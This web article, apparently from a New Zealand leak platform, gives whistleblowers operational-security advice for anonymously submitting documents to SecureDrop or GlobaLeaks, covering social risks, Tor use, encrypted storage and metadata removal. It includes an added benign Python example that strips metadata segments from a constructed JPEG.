[ full story on Putatara.net ]

How to securely leak information to a SecureDrop or GlobaLeaks whistleblower platform


Your number one priority in sharing truth is to preserve your anonymity. Highly secure platforms for secure disclosure of information like SecureDrop and GlobaLeaks go as far as technically possible to protect your identity and to protect the transfer and dissemination of your information to the world.

However you need to take the right countermeasures to protect yourself long before you arrive at the point of sending information.

These mandatory considerations can be grouped in three categories: Social Risks, Social Responsibilities, Technological Risks

Social Risks

After a piece information has been liberated, and when the news about the facts related to the info you submitted reaches public media attention, yo uneed to understand the process that will take place around you. You need to have a clear understanding of how submitted information can be a risk to you even if your identity is protected.

  • Who else has access to, or knows that you have access to, this information?
  • Are you ready to cope with all the “stress” of an internal or external investigation?

Social Responsibilities

After a piece of information has been liberated, pressure will come on everyone who could potentially have disclosed the confidential information.

  • Will your anonymous disclosing bring undue persecution on others who will fall under heavy scrutiny along with yourself?
  • Will your anonymous disclosing cause further persecution on victims that would rather remain anonymous?

You should consider submitting to a SecureDrop or GlobaLeaks platform only after fully understanding these points.

Technological Risks

You must be aware that while using a computer and the internet to exchange information, most of the actions you take leave traces (computer logs) that could lead an investigator to identify where you are and who you are.

You may leave computer traces while:

  • Researching the information to be submitted
  • Acquiring the information to be submitted
  • Reading even this web page
  • Submitting the information to us
  • Exchanging data with receivers of your submission

All these actions may leave traces that compromise your security, but with a few technological protection steps, you can minimise the risks.

Social Protection

  • Don’t ever tell your intention to anyone before you make a submission
  • Don’t ever tell your intention to anyone after you make a submission
  • Don’t ever tell your intention to anyone after the news about the submission gets out to public media
  • Be sure that there are no surveillance systems ( cameras or other ) in the place where you acquire and submit the information
  • Don’t look around on search engines or news media website for the information you submitted ( this would reveal that you knew about it earlier )

Technological Protection

To achieve a 100% guarantee of security from a technical perspective, you need to be computer-proficient enough to fully understand all the risks.

However, by strictly following the procedures and tips reported below, you should be safe enough:

  • Submit information using Anonymous Web Browsing software Tor Browser Bundle
  • Don’t submit information from the personal computer provided to you by your employer
  • Keep the Submission’s Receipt ( GlobaLeaks ) or Diceware Phrase ( SecureDrop ) safe, and destroy this information after you don’t need it anymore
  • Don’t keep a copy of the information you submitted!
  • While acquiring the information to be submitted, be sure that no traces are left leading back to your identity ( eg: store files using VeraCrypt on your USB key, and when the submission process is completed, grind the USB key down to powder using a file or hand grinder )
  • Be aware of the fact that “meta data information” may be present in some of the data you are submitting.
  • Consider cleaning up the Metadata by using tools such as ExifTool, Exiv2, Exif Jpeg header manipulation tool, and/or MAT bundled with the TAILS linux live CD.
  • Consider converting all the data that you are sending us into standard PDF format.
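To make the metadata point above concrete, here is an added example (not code from the original post, nor from ExifTool, Exiv2 or MAT) that walks a JPEG's marker segments with only the Python standard library and drops the segments that carry metadata (Exif, XMP, ICC, comments). The JPEG it operates on is constructed inline, not a real photo, and the segment-stripping approach is a simplified stand-in for what the named tools do.

```python
"""Strip Exif/APPn and COM metadata segments from a JPEG (added example)."""
import struct

SOI, SOS = 0xFFD8, 0xFFDA
# Metadata-bearing segments: APP1..APP15 (Exif, XMP, ICC, ...) and COM.
# APP0 (JFIF) is kept because many decoders expect it to be present.
STRIP = {0xFFE1 + i for i in range(15)} | {0xFFFE}


def jpeg_segments(data):
    """Yield (marker, raw_segment) for every segment after SOI; the
    SOS segment is yielded together with everything that follows it."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG (missing SOI marker)")
    pos = 2
    while pos + 4 <= len(data):
        marker, length = struct.unpack(">HH", data[pos:pos + 4])
        if marker >> 8 != 0xFF:
            raise ValueError("corrupt marker at offset %d" % pos)
        if marker == SOS:  # entropy-coded scan data: keep it verbatim
            yield marker, data[pos:]
            return
        yield marker, data[pos:pos + 2 + length]
        pos += 2 + length


def strip_metadata(data):
    """Return the JPEG with all APP1..APP15 and COM segments removed."""
    out = bytearray(b"\xff\xd8")
    for marker, seg in jpeg_segments(data):
        if marker not in STRIP:
            out += seg
    return bytes(out)


def list_markers(data):
    """Markers present before/at SOS, useful to verify a clean file."""
    return [marker for marker, _ in jpeg_segments(data)]


def _seg(marker, payload):  # build one length-prefixed segment
    return struct.pack(">HH", marker, len(payload) + 2) + payload


# Constructed sample: JFIF header, a fake Exif block, a comment, then a
# minimal scan header, three bytes of "image data" and EOI.
SAMPLE_JPEG = (
    b"\xff\xd8"
    + _seg(0xFFE0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
    + _seg(0xFFE1, b"Exif\x00\x00MM\x00*\x00\x00\x00\x08\x00\x00")
    + _seg(0xFFFE, b"COMMENT: constructed sample")
    + _seg(SOS, b"\x01\x01\x00\x00\x3f\x00")
    + b"\x12\x34\x56"
    + b"\xff\xd9"
)
```

Run `list_markers(strip_metadata(SAMPLE_JPEG))` to confirm only the JFIF and SOS segments remain; for real submissions, the full tools named above also cover formats other than JPEG.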

By applying the above described procedures, you will be safe enough.

Safe enough doesn’t mean 100% safe.

To improve your overall digital security, you should read the Security-in-a-Box project, which explains most of the risks and related countermeasures.

Security of the Hokioi Security Secure Submission Platform

The Hokioi Security Secure Submission Platform is implemented using the GlobaLeaks software, and anonymity for the confidential source is provided by the Tor software.

Tor is the state of the art when it comes to protecting anonymity digitally, and it has received a lot of attention from both the academic research community and experts in the IT security field.

GlobaLeaks is the first open-source, secure and anonymous confidential-source platform, designed by the Hermes Center for Transparency and Digital Human Rights.

Tor is already integrated in GlobaLeaks; that way, the Site Owner does not obtain any kind of traces or information about the Confidential Source’s identity or location.

Complete security can never be guaranteed; however, we have designed this technology taking into account scenarios where a confidential source’s life and liberty may be at stake.

Having read all that, the Tor-accessible website address of the Hokioi Security Secure Submission Platform is:

https://aotearoaleaks.org/

Other Secure Submission Platforms of note:

~~~~~~~~~~~~~~~~~~~~~//~~~~~~~~~~~~~~~~~~~~~~~~~